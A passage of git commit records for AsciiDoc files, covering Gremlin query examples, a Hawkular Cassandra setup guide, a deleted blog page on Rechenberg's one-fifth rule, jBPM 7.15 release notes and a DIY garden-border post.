valueMap()\n\/\/ only D has a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n  union(where(out(\"occured_at\").has(\"date\", gt(20160817))),\n        __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n  valueMap()\n\/\/ neither D nor E have a valid date\ng.V().has(\"name\", \"A\").out(\"rel\").\n  union(where(out(\"occured_at\").has(\"date\", lt(20160817))),\n        __.not(outE(\"occured_at\")).coalesce(out().hasLabel(\"dimon\"), identity())).\n  valueMap()\n----\n\n[[appendix-i]]\n_Use element labels in a `select`._\n\n[gremlin-groovy,modern]\n----\ng.V(1).as(\"a\").\n  both().\n  map(group().by(label).by(unfold())).as(\"b\").\n  select(\"a\",\"b\").\n  map(union(project(\"a\").by(select(\"a\")), select(\"b\")).\n  unfold().\n  group().\n    by(select(keys)).\n    by(select(values)))\ng.V().as(\"a\").\n  both().\n  map(group().by(label).by(unfold())).as(\"b\").\n  select(\"a\",\"b\").\n  group().\n    by(select(\"a\")).\n    by(select(\"b\").\n  group().\n    by(select(keys)).\n    by(select(values).fold())).\n  unfold().\n  map(union(select(keys).project(\"a\").by(), select(values)).\n  unfold().\n  group().\n    by(select(keys).unfold()).\n    by(select(values).unfold().unfold().fold()))\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db90f78abc3598fb799cee7b93afb80ea11aecb8","subject":"Change the way the Cassandra location is provided.","message":"Change the way the Cassandra location is provided.\n","repos":"jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_contents":"= Installation Guide\nThomas Heute\n2015-09-08\n:description: Installing Hawkular\n:jbake-type: page\n:jbake-status: published\n:icons: font\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Installing the server\nPlease follow the instructions in the link:quick-start.html[Quick Start document] for the server itself, followed by the Cassandra instructions below.\n\n== Using an external Cassandra Cluster\nBeyond basic usage and development, you will likely want to configure Hawkular\nto use an external Cassandra cluster.\n\n
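Each node in such a cluster is identified by the `rpc_address` it advertises in its own `cassandra.yaml`, and, as described below, those are the addresses Hawkular must be given. A minimal sketch of the relevant setting (the address shown is an illustrative assumption):\n\n[source,yaml]\n----\n# cassandra.yaml on each node\nrpc_address: 192.168.1.10\n----\n\nNOTE: Hawkular requires Cassandra 2.2.x or later. 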
It is recommended to use the\nlatest 2.2.x release if possible.\n\nFortunately, this only requires setting\na few system properties.\n\nFrom the command line::\n\n.Using a Cassandra cluster on localhost\n[source,shell]\n----\nbin\/standalone.sh -Dhawkular.backend=remote\n----\n\n.Using a Cassandra cluster on different hosts\n[source,shell]\n----\nexport CASSANDRA_NODES=\"cassandra_host1,cassandra_host2,...\"\nbin\/standalone.sh -Dhawkular.backend=remote\n----\n\nThe `CASSANDRA_NODES` environment variable should be a comma-delimited list\nof Cassandra node endpoint addresses. The value for each address should match the\nvalue of the `rpc_address` in the cassandra.yaml configuration file. You do not\nactually have to specify the address of every Cassandra node. As long as Hawkular\nis able to connect to one node, it will discover all of the other cluster nodes.\n\nFrom standalone.xml::\n[source,xml]\n----\n<system-properties>\n    <property name=\"hawkular-metrics.cassandra-nodes\" value=\"node_1_address,node_2_address,node_n_address\"\/>\n    <property name=\"hawkular.backend\" value=\"remote\"\/>\n<\/system-properties>\n----\n\nTIP: You can change the keyspace used by setting the `cassandra.keyspace` system property.\n\n","old_contents":"= Installation Guide\nThomas Heute\n2015-09-08\n:description: Installing Hawkular\n:jbake-type: page\n:jbake-status: published\n:icons: font\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Installing the server\nPlease follow the instruction in the link:quick-start.html[Quick Start document] for the server itself, followed by the Cassandra instructions below.\n\n== Using an external Cassandra Cluster\nBeyond basic usage and development, you will likely want to configure Hawkular\nto use an external Cassandra cluster.\n\nNOTE: Hawkular requires Cassandra 2.2.x or later. It is recommended to use the\nlatest 2.2.x release if possible.\n\nFortunately, this only requires setting\na few system properties.\n\nFrom the command line::\n[source,shell]\n----\nbin\/standalone.sh -Dhawkular-metrics.cassandra-nodes=\"node_1_address,node_2_address,node_n_address\" -Dhawkular-metrics.backend=remote\n----\n\nThe `hawkular-metrics.cassandra-nodes` property should be a comma-delimited list\nof Cassandra node endpoint addresses. The value for each address should match the\nvalue of the `rpc_address` in the cassandra.yaml configuration file. You do not\nactually have to specify the address of every Cassandra node. 
As long as Hawkular\nis able to connect to one node, it will discover all of the other cluster nodes.\n\nFrom standalone.xml::\n[source,xml]\n----\n<system-properties>\n <property name=\"hawkular-metrics.cassandra-nodes\" value=\"node_1_address,node_2_address,node_n_address\"\/>\n <property name=\"hawkular-metrics.backend\" value=\"remote\"\/>\n<\/system-properties>\n----\n\nTIP: You can change the keyspace used by setting the `cassandra.keyspace` system property.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de160335f9c041507422fccd1ef02c57f35a08e1","subject":"Deleted 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","message":"Deleted 2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"<!DOCTYPE html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <meta http-equiv=\"Content-Type\" content=\"text\/html; charset=utf-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">\n\n <title>Recenberg one-fifth success rule applied to life<\/title>\n\n <meta name=\"HandheldFriendly\" content=\"True\">\n <meta name=\"MobileOptimized\" content=\"320\">\n <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\n <meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black-translucent\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1\">\n\n <meta name=\"description\" content=\"\">\n\n <meta name=\"twitter:card\" content=\"summary\">\n <meta name=\"twitter:title\" content=\"Recenberg one-fifth success rule applied to life\">\n <meta name=\"twitter:description\" content=\"\">\n\n <meta property=\"og:type\" content=\"article\">\n <meta property=\"og:title\" content=\"Recenberg one-fifth success rule applied to life\">\n <meta property=\"og:description\" content=\"\">\n\n <!-- <meta name=\"twitter:site\" content=\"\">\n\n<meta name=\"twitter:creator\" content=\"\">\n\n<meta name=\"google-site-verification\" content=\"\">\n\n<meta property=\"fb:admins\" content=\"\">\n -->\n\n <link href=\"\/favicon.ico\" rel=\"shortcut icon\" type=\"image\/x-icon\">\n <link href=\"\/apple-touch-icon-precomposed.png\" rel=\"apple-touch-icon\">\n\n <link href=\"\/\/fonts.googleapis.com\/\" rel=\"dns-prefetch\">\n <link href=\"\/\/fonts.googleapis.com\/css?family=Droid+Serif:400,700,400italic|Open+Sans:700,400&subset=latin,latin-ext\" rel=\"stylesheet\">\n\n <link rel=\"stylesheet\" href=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/css\/main.min.css?v=1483597019971\"\/>\n <link rel=\"stylesheet\" href=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/css\/custom.css?v=1483597019971\"\/>\n <link rel=\"stylesheet\" href=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/css\/asciidoctor-foundation.css?v=1483597019971\"\/>\n\n\n\n\n <script type=\"text\/javascript\">\n var ga_ua = 'UA-XXXXX-X';\n \n var disqus_shortname = 'example';\n \n var enable_pjax = true;\n\n \/\/ Pace Options\n \/\/ ==============\n window.paceOptions = {\n catchupTime: 100,\n minTime: 100,\n elements: false,\n restartOnRequestAfter: 500,\n startOnPageLoad: false\n }\n\n \/\/ Ghostium Globals\n \/\/ ==============\n window.GHOSTIUM = {};\n GHOSTIUM.haveGA = typeof ga_ua !== 'undefined' && 
ga_ua !== 'UA-XXXXX-X';\n GHOSTIUM.haveDisqus = typeof disqus_shortname !== 'undefined' && disqus_shortname !== 'example';\n GHOSTIUM.enablePjax = typeof enable_pjax !== 'undefined' ? enable_pjax : true;\n <\/script>\n\n <script src=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/js\/head-scripts.min.js?v=1483597019971\"><\/script>\n\n <link rel=\"canonical\" href=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" \/>\n <meta name=\"referrer\" content=\"origin\" \/>\n \n <meta property=\"og:site_name\" content=\"Ragha's Blog\" \/>\n <meta property=\"og:type\" content=\"website\" \/>\n <meta property=\"og:title\" content=\"Recenberg one-fifth success rule applied to life\" \/>\n <meta property=\"og:description\" content=\"For those who are not familiar, Rechenberg&#8217;s 1\/5th rule refers to adaptive mutation in evolutionary strategies. It suggests that the ratio of successful mutations to all mutation should be 1\/5. It is a rough heuristic for balancing exploration vs. exploitation that worked out pretty well in\" \/>\n <meta property=\"og:url\" content=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" \/>\n <meta property=\"article:tag\" content=\"light bulb\" \/>\n <meta property=\"article:tag\" content=\" migrated\" \/>\n \n <meta name=\"twitter:card\" content=\"summary\" \/>\n <meta name=\"twitter:title\" content=\"Recenberg one-fifth success rule applied to life\" \/>\n <meta name=\"twitter:description\" content=\"For those who are not familiar, Rechenberg&#8217;s 1\/5th rule refers to adaptive mutation in evolutionary strategies. It suggests that the ratio of successful mutations to all mutation should be 1\/5. It is a rough heuristic for balancing exploration vs. 
exploitation that worked out pretty well in\" \/>\n <meta name=\"twitter:url\" content=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" \/>\n \n <script type=\"application\/ld+json\">\nnull\n <\/script>\n\n <meta name=\"generator\" content=\"HubPress\" \/>\n <link rel=\"alternate\" type=\"application\/rss+xml\" title=\"Ragha's Blog\" href=\"https:\/\/raghakot.github.io\/rss\/\" \/>\n <\/head>\n <body class=\"post-template tag-light-bulb tag-migrated\">\n\n <button data-action=\"open-drawer\" id=\"drawer-button\" class=\"drawer-button\"><i class=\"fa fa-bars\"><\/i><\/button>\n <nav tabindex=\"-1\" class=\"drawer\">\n <div class=\"drawer-container\">\n <!--.drawer-search(role=\"search\")-->\n <ul role=\"navigation\" class=\"drawer-list\">\n \n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/raghakot.github.io\" data-pjax>\n <i class=\"fa fa-home\"><\/i>Home\n <\/a>\n <\/li>\n <!-- <li class=\"drawer-list-item\">\n <a href=\"https:\/\/raghakot.github.io\" title=\"Ragha's Blog\" data-pjax>\n <i class=\"fa fa-list-alt\"><\/i>All posts\n <\/a>\n <\/li> -->\n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/raghakot.github.io\/rss\/\">\n <i class=\"fa fa-rss\"><\/i>Subscribe to Feed\n <\/a>\n <\/li>\n <li class=\"drawer-list-divider\"><\/li>\n <li class=\"drawer-list-item drawer-list-title\">\n Follow me\n <\/li>\n \n \n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/github.com\/raghakot\" title=\"Github\" target=\"_blank\">\n <i class=\"fa fa-github\"><\/i>Github\n <\/a>\n <\/li>\n <li class=\"drawer-list-item\">\n <a href=\"https:\/\/www.linkedin.com\/in\/raghavendra-kotikalapudi-79528411\" title=\"LinkedIn\" target=\"_blank\">\n <i class=\"fa fa-linkedin\"><\/i>LinkedIn\n <\/a>\n <\/li>\n <li class=\"drawer-list-item\">\n <a href=\"mailto:ragha@outlook.com\" title=\"Email\" target=\"_blank\">\n <i class=\"fa fa-envelope-o\"><\/i>Email\n <\/a>\n <\/li>\n <\/ul>\n <\/div>\n <\/nav>\n\n <div class=\"drawer-overlay\"><\/div>\n <main id=\"container\" role=\"main\" class=\"container\">\n <div class=\"surface\">\n <div class=\"surface-container\">\n <div data-pjax-container class=\"content\">\n \n<section class=\"wrapper wrapper-post\">\n <div class=\"wrapper-container\">\n <article itemscope itemtype=\"http:\/\/schema.org\/BlogPosting\" role=\"article\" class=\"post post tag-light-bulb tag-migrated\">\n <section class=\"post-container\">\n <header class=\"post-header\">\n <ul class=\"post-meta-list\">\n <li class=\"post-meta-item\">\n <time datetime=\"2010-12-01\" itemprop=\"datePublished\">\n 6 years ago\n <\/time>\n <\/li>\n <li class=\"post-meta-item\">\n <span class=\"tags\"><i class=\"fa fa-tags\"><\/i>\n <span>\n <a href=\"https:\/\/raghakot.github.io\/tag\/light-bulb\/\">light bulb<\/a>, <a href=\"https:\/\/raghakot.github.io\/tag\/migrated\/\"> migrated<\/a><\/span>\n <\/span>\n <\/li>\n <li class=\"post-meta-item\">\n <a href=\"#disqus_thread\" data-disqus-identifier=\"\">Comments<\/a>\n <\/li>\n <\/ul>\n <h1 itemprop=\"name headline\" class=\"post-title\"><a href=\"https:\/\/raghakot.github.io\/2010-12-8-Recenberg-one-fifth-success-rule-applied-to-life.adoc\" itemprop=\"url\" data-pjax title=\"Recenberg one-fifth success rule applied to life\">Recenberg one-fifth success rule applied to life<\/a><\/h1>\n <!--h2 itemprop=\"about\" class=\"post-subtitle\"><\/h2-->\n <\/header>\n <aside class=\"post-side\">\n <div class=\"post-author\">\n <a href=\"\" class=\"post-author-avatar\">\n <img 
src=\"https:\/\/avatars.githubusercontent.com\/u\/15642444?v=3\" alt=\"Raghavendra Kotikalapudi\">\n <\/a>\n <div class=\"post-author-info\">\n <a href=\"\" class=\"post-author-name\">\n Raghavendra Kotikalapudi\n <\/a>\n <p class=\"post-author-bio\"><\/p>\n <\/div>\n <\/div>\n <\/aside>\n <div itemprop=\"articleBody\" class=\"post-body\">\n <div class=\"paragraph\">\n<p>For those who are not familiar, Rechenberg’s 1\/5th rule refers to adaptive mutation in evolutionary strategies. It suggests that the ratio of successful mutations to all mutation should be 1\/5. It is a rough heuristic for balancing exploration vs. exploitation that worked out pretty well in experiments.<\/p>\n<\/div>\n<div class=\"paragraph\">\n<p>Perhaps we should apply this principle in life. If you are always successful (more than 1 out of 5 contiguous tries) then you are converging too fast to a local optima (aka safe options), resulting in stagnation later on. Ideally, atleast according to Rechenberg, one should try four risky avenues for every safe choice to optimally balance stagnation vs. growth.<\/p>\n<\/div>\n <\/div>\n <footer class=\"post-footer\">\n <div itemprop=\"author\" itemscope itemtype=\"http:\/\/schema.org\/Person\" class=\"post-author\">\n <a href=\"\" class=\"post-author-avatar\">\n <img itemprop=\"image\" src=\"https:\/\/avatars.githubusercontent.com\/u\/15642444?v=3\" alt=\"Raghavendra Kotikalapudi\">\n <\/a>\n <div class=\"post-author-info\">\n <h4 class=\"post-footer-heading\">Written By<\/h4>\n <a href=\"\" itemprop=\"url\" class=\"post-author-name\">\n <span itemprop=\"name\">Raghavendra Kotikalapudi<\/span>\n <\/a>\n <p itemprop=\"description\" class=\"post-author-bio\"><\/p>\n <p class=\"post-author-location\">Seattle WA<\/p>\n <p class=\"post-info\">\n <b class=\"post-info-title\">Published on<\/b>\n <time class=\"post-date\">December 01, 2010<\/time>\n <\/p>\n <\/div>\n <\/div>\n <div class=\"post-social\">\n <h4 class=\"post-footer-heading\">Spread the word<\/h4>\n <a href=\"#\" data-action=\"share-twitter\"><i class=\"fa fa-fw fa-lg fa-twitter\"><\/i><\/a>\n <a href=\"#\" data-action=\"share-facebook\"><i class=\"fa fa-fw fa-lg fa-facebook\"><\/i><\/a>\n <a href=\"#\" data-action=\"share-gplus\"><i class=\"fa fa-fw fa-lg fa-google-plus\"><\/i><\/a>\n <\/div>\n <\/footer>\n <\/section>\n <section itemprop=\"comment\" class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <\/section>\n <\/article>\n\n <footer role=\"contentinfo\" class=\"footer\">\n <p><small>Copyright © <span itemprop=\"copyrightHolder\">Ragha's Blog<\/span>. 2017. 
All Rights Reserved.<\/small><\/p>\n <p><small><a href=\"http:\/\/ghostium.oswaldoacauan.com\/\" target=\"_blank\">Ghostium Theme<\/a> by <a href=\"http:\/\/twitter.com\/oswaldoacauan\" target=\"_blank\">@oswaldoacauan<\/a><\/small><\/p>\n <p><small>Adapted by <a href=\"https:\/\/twitter.com\/mgreau\">Maxime Gr\u00e9au<\/a><\/small><\/p>\n <p><small>Published with <a href=\"http:\/\/hubpress.io\">HubPress<\/a><\/small><\/p>\n <\/footer>\n <\/div>\n<\/section>\n\n\n<section class=\"post-comments\">\n <div id=\"disqus_thread\"><\/div>\n <script type=\"text\/javascript\">\n var disqus_shortname = 'raghakot-github-io'; \/\/ required: replace example with your forum shortname\n \/* * * DON'T EDIT BELOW THIS LINE * * *\/\n (function() {\n var dsq = document.createElement('script'); dsq.type = 'text\/javascript'; dsq.async = true;\n dsq.src = '\/\/' + disqus_shortname + '.disqus.com\/embed.js';\n (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);\n })();\n <\/script>\n <noscript>Please enable JavaScript to view the <a href=\"http:\/\/disqus.com\/?ref_noscript\">comments powered by Disqus.<\/a><\/noscript>\n <a href=\"http:\/\/disqus.com\" class=\"dsq-brlink\">comments powered by <span class=\"logo-disqus\">Disqus<\/span><\/a>\n<\/section>\n\n\n <\/div>\n <\/div>\n <\/div>\n <\/main>\n\n <script src='https:\/\/cdn.mathjax.org\/mathjax\/latest\/MathJax.js?config=TeX-AMS-MML_HTMLorMML'><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/jquery\/2.1.3\/jquery.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/moment.js\/2.9.0\/moment-with-locales.min.js?v=\"><\/script> <script src=\"\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/8.4\/highlight.min.js?v=\"><\/script> \n <script type=\"text\/javascript\">\n jQuery( document ).ready(function() {\n \/\/ change date with ago\n jQuery('ago.ago').each(function(){\n var element = jQuery(this).parent();\n element.html( moment(element.text()).fromNow());\n });\n });\n\n hljs.initHighlightingOnLoad();\n <\/script>\n\n <script src=\"\/\/raghakot.github.io\/themes\/ghostium\/assets\/js\/foot-scripts.min.js?v=1483597019971\"><\/script>\n\n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\n (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\n m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\n })(window,document,'script','\/\/www.google-analytics.com\/analytics.js','ga');\n\n ga('create', 'UA-78195880-1', 'auto');\n ga('send', 'pageview');\n\n <\/script>\n\n <\/body>\n<\/html>\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9714423a183e97fe30f5534d3f3a491222694097","subject":"jBPM N&N for 7.15 release (#1215)","message":"jBPM N&N for 7.15 release (#1215)\n\n","repos":"michelehaglund\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs,manstis\/kie-docs,jomarko\/kie-docs","old_file":"doc-content\/jbpm-docs\/src\/main\/asciidoc\/ReleaseNotes\/Release.7.15.0.Final-section.adoc","new_file":"doc-content\/jbpm-docs\/src\/main\/asciidoc\/ReleaseNotes\/Release.7.15.0.Final-section.adoc","new_contents":"[[_jbpmreleasenotes7150]]\n\n= New and Noteworthy in jBPM 7.15.0\n\nThe following features were added to jBPM 7.15\n\n\n== Manage section error messages handling\n\nThis release includes improvements to error scenarios when using any of the manage section operations, providing more detailed\ninformation about exceptions when communicating 
with a remote server.\nA more specific alert panel for when no Kie Server instance is connected or is missing the required `Process`\ncapability is also included to better inform users.\n\nimage:ReleaseNotes\/ConsoleErrorBlockingUI.png[align=\"center\", title=\"Alert panel\"]\n\n\n== New timeline view for Task Logs\n\nIn this release, the Task Logs view was redesigned, allowing users to easily visualize the events related\nto a specific task on a timeline.\nEvents are highlighted in blue to indicate a transition in the task lifecycle, for events like 'Claim' and 'Start', and\nare greyed out to indicate the completion of the task or a user releasing it.\n\nBy default, the latest 10 events are presented in the timeline, but users can load more data all the way back to\nthe task creation.\n\n\nimage:ReleaseNotes\/task-logs_7.15.0.png[align=\"center\", title=\"Task Logs timeline\"]\n\n== KIE Server forms HTML elements support for variables\n\nThe recently added KIE Server form rendering has been enhanced to extract variables referenced in HTML elements of the form.\nWhen designing forms that use HTML elements, users can refer to process or task variables that will be extracted at rendering time.\n\n[source, html]\n----\n<h3>Hello ${user.name}!<\/h3>\n----\n\nThe above expression (`${user.name}`) will be extracted at rendering time, assuming there is a user (task or process) variable available.\n\n== Camel component for jBPM has been significantly improved\n\nApache Camel comes with a huge set of components to integrate with various systems. There has been a\n*camel-jbpm* component for quite some time (since Camel 2.6), but it was based on the v6 `kie-remote-client`\nand supported only the producer side.\n\nWith Camel version 2.23.0 the *camel-jbpm* component has been significantly improved and upgraded. It now supports the latest\nversion of jBPM, and for the producer it relies on `kie-server-client` instead of `kie-remote-client`.\nIn addition, consumer support has been added, which allows Camel routes to be initiated by:\n\n* process event listeners\n* task life cycle event listeners\n* case event listeners\n\nOn top of that, there is also a Camel-based event emitter that allows events to be sent through the event emitter infrastructure using Camel routes.\n\nSee the http:\/\/mswiderski.blogspot.com\/2018\/11\/jbpm-empowered-by-camel-to-integrate.html[following article] for more details and a sample project.\n\n== Audit log mode applies to task and case audit logs\n\nThe well-known audit mode setting from the deployment descriptor now supports all three types of audit logs:\n\n* process (has been supported from the beginning)\n* task\n* case\n\nThe supported audit modes are:\n\n* JPA (default)\n* JMS\n* None\n\nNOTE: None does not apply to case audit data, as these entries are mandatory and must be stored (either directly or via JMS).\n\n== Variable indexer supported for case file data\n\nProcess and task variables allow the use of a custom VariableIndexer to store the information in log tables.\n7.15 adds support for using a VariableIndexer for case file data. 
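The indexer implements the `CaseVariableIndexer` interface, mirroring the existing process and task variable indexers. 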
An example of case variable\nindexer can be found below\n\n[source, java]\n----\npublic class PatientCaseVariableIndexer implements CaseVariableIndexer {\n\n @Override\n public boolean accept(Object variable) {\n return Patient.class.isAssignableFrom(variable.getClass());\n }\n\n @Override\n public List<CaseFileData> index(String name, Object variable) {\n List<CaseFileData> indexed = new ArrayList<CaseFileData>();\n\n CaseFileDataLog caseVariable = new CaseFileDataLog();\n caseVariable.setItemName(name);\n caseVariable.setItemValue(variable == null ? \"\" : variable.toString());\n caseVariable.setItemType(variable.getClass().getName());\n\n indexed.add(caseVariable);\n\n \/\/ add mapped information as another entry\n CaseFileDataLog caseVariableMapped = new CaseFileDataLog();\n caseVariableMapped.setItemName(name + \"_name\");\n caseVariableMapped.setItemValue(((Patient) variable).getName());\n caseVariableMapped.setItemType(String.class.getName());\n\n indexed.add(caseVariableMapped);\n\n return indexed;\n }\n}\n----\n\nIn the above mentioned example single Patient case variable will be stored in data log table\nas two entires (rows) to allow more fine grained searching capabilities.\n","old_contents":"[[_jbpmreleasenotes7150]]\n\n= New and Noteworthy in jBPM 7.15.0\n\nThe following features were added to jBPM 7.15\n\n\n== Manage section error messages handling\n\nThis release includes improvements to error scenarios when using any of the manage section operations, providing more detailed\ninformation about exceptions when communicating with a remote server.\nA more specific alert panel for when no Kie Server instance is connected or is missing the required `Process`\ncapability is also included to better inform users.\n\nimage:ReleaseNotes\/ConsoleErrorBlockingUI.png[align=\"center\", title=\"Alert panel\"]\n\n\n== New timeline view for Task Logs\n\nIn this release, Task Logs view was redesigned, allowing users to easily visualize the events related\nto a specific task based on a timeline of events.\nEvents are highlighted in blue to indicate a transition in the Task lifecycle for events like 'Claim' and 'Start' and\nhave a grey out highlight to indicate the completion of the task or a user releasing it.\n\nBy default, the latest 10 events are presented in the timeline but users can load more data all the way back to the\nthe task creation.\n\n\nimage:ReleaseNotes\/task-logs_7.15.0.png[align=\"center\", title=\"Task Logs timeline\"]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3aed04d9dcc18092dfa3684dd775bfe1472b459","subject":"Update 2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","message":"Update 2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","new_file":"_posts\/2015-02-15-Recycling-Fence-Palings-for-Tree-Borders.adoc","new_contents":"= Recycling Fence Palings for Tree Borders\n:hp-tags: reclaim, reuse, recycle, garden borders\n:hp-image: covers\/ideas.jpg\n:published_at: 2015-02-15\n \nI had some old treated pine fence palings left over from when I replaced all the side gate palings. 
My wife suggested I use them to fix up the borders around the trees, so I took her advice and got it done over two weekends. \n\nimage::Tree_Border_Two.jpg[title=\"The Finished Product\", width=\"300, height=\"500\"]\n\n== Would You Use Wood That Would Cost You Nix?\n\n*I would*. Seriously, if you can get wood cheap or free, you take it and save some big cash. I could have gone and purchased some new wood from the hardware store, but that would have almost doubled the cost of the job. \n\nThe most time consuming part of the job was dressing off the old pine planks, and painting them. They were pretty rough and a mouse sander quickly took care of that. \n\nNOTE: If you don't have a bunch of palings lying around like I did, you might want to go to your local reclamation yard. There might be some good quality timber you can use there.\n\n== Wood That Wasn't Free\n\nI did actually fork our for some new timber. The spacers required for the job were cut at the cutting station at Bunnings. \n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Spacers.jpg[title=\"Spacers\", width=\"300, height=\"500\"]\n\nI have to say I could have probably done a better job myself regarding size consistency, but at 12 blocks to be cut, paying 50c a cut was worth it. And the size still worked OK, so not a problem.\n\n== Free Paint is Free, Except When You Run Out of Undercoat\n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Painted.jpg[title=\"Painted Slats\", width=\"300, height=\"500\"]\n\nThe paint colour was a water-based interior colour, courtesy of Masters North Lakes, after they gave us a whole stack of mistint tins as part of a Sausage Sizzle Fundraiser we conducted. Our childs' Kindergarten couldn't accept them due to the paint not being non-toxic, so we saved this colour specifically for this job, and gave the other tin to them for minor touch-ups around the Kindy. \n\n\nBecasue this wasn't a standard fence paint, I needed to undercoat before painting with two top coats. This quite literally took all weekend last weekend. I _nearly_ had enough undercoat to get the job done, but I had to fork out about $25 for a new tin. Undercoat is a good thing to have around anyhow, so I wan't too worried.\n\n== Measure Twice, Then Check The Fit, Then Cut\n\nEven though I measured once, measured twice, I still had some issues with measurements. A quick cut here and there fixed that. I got it mostly right. I had assembly knocked over this morning. The key with this type of thing is to paint the planks first before assembly. Then only cut one end of the plank if you need to make adjustments. This way you don't need to repaint the raw edge becasue it is abutted against a painted side. \n\n== All In All, Not A Bad Job\n\nAll in all, they've come up really nicely. All up, I spent about $100 including some tools I needed for the job. Most of the expense was for the plank of plywood I used to convert my glass-top office desk to a workbench. That paid dividends these two weekends for sure.\n\nimage::Tree_Border_Two.jpg[title=\"Being Frugal Pays\", width=\"300, height=\"500\"]","old_contents":"= Recycling Fence Palings for Tree Borders\n:hp-tags: reclaim, reuse, recycle, garden borders\n:hp-cover: covers\/ideas.jpg\n:published_at: 2015-02-15\n \nI had some old treated pine fence palings left over from when I replaced all the side gate palings. My wife suggested I use them to fix up the borders around the trees, so I took her advice and got it done over two weekends. 
\n\nimage::Tree_Border_Two.jpg[title=\"The Finished Product\", width=\"300, height=\"500\"]\n\n== Would You Use Wood That Would Cost You Nix?\n\n*I would*. Seriously, if you can get wood cheap or free, you take it and save some big cash. I could have gone and purchased some new wood from the hardware store, but that would have almost doubled the cost of the job. \n\nThe most time consuming part of the job was dressing off the old pine planks, and painting them. They were pretty rough and a mouse sander quickly took care of that. \n\nNOTE: If you don't have a bunch of palings lying around like I did, you might want to go to your local reclamation yard. There might be some good quality timber you can use there.\n\n== Wood That Wasn't Free\n\nI did actually fork our for some new timber. The spacers required for the job were cut at the cutting station at Bunnings. \n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Spacers.jpg[title=\"Spacers\", width=\"300, height=\"500\"]\n\nI have to say I could have probably done a better job myself regarding size consistency, but at 12 blocks to be cut, paying 50c a cut was worth it. And the size still worked OK, so not a problem.\n\n== Free Paint is Free, Except When You Run Out of Undercoat\n\nimage::http:\/\/jaredmorgs.github.io\/images\/Tree_Border_Palings_Painted.jpg[title=\"Painted Slats\", width=\"300, height=\"500\"]\n\nThe paint colour was a water-based interior colour, courtesy of 